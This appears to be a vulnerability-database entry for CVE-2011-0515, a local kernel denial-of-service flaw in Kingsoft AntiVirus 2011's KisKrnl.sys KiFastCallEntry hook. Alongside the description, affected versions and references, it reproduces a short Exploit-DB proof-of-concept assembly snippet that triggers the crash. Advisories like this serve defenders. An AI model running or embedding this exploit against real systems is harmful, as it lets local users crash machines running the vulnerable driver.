CVE-2011-0515
Description
KisKrnl.sys 2011.1.13.89 and earlier in Kingsoft AntiVirus 2011 SP5.2 allows local users to cause a denial of service (crash) via a crafted request that is not properly handled by the KiFastCallEntry hook.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Kingsoft AntiVirus 2011 SP5.2 'KisKrnl.sys' 2011.1.13.89 - Local Kernel Mode Denial of Service
# Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 Local Kernel Mode D.O.S Exploit
# Date: 2011-1-16
# Author: MJ0011
# Software Link: http://cd001.www.duba.net/duba/install/2011/once/KAV110114_DOWN_9_13.exe
# Version: KingSoft AntiVirus 2011 SP5.2 with KisKrnl.sys <=2011.1.13.89
# Tested on: Windows XP SP3
DETAILS:
KisKrnl.sys hook the kernel function KiFastCallEntry , but is not correctly handle user stack pointer
EXPLOIT CODE:
__asm
{
mov edx , 0x80000000
mov eax , 0x101 ;id of NtTerminateProcess under Windows XP
int 0x2e
}Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| kingsoft | kingsoft_antivirus | 2010.04.26.648 | |
| kingsoftsecurity | kingsoft_antivirus | 2011 | |
References
- http://secunia.com/advisories/42937
- http://www.exploit-db.com/exploits/15998
- http://www.securityfocus.com/archive/1/515767/100/0/threaded
- http://www.securityfocus.com/bid/45821
- https://exchange.xforce.ibmcloud.com/vulnerabilities/64723
- http://secunia.com/advisories/42937
- http://www.exploit-db.com/exploits/15998
- http://www.securityfocus.com/archive/1/515767/100/0/threaded
- http://www.securityfocus.com/bid/45821
- https://exchange.xforce.ibmcloud.com/vulnerabilities/64723
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.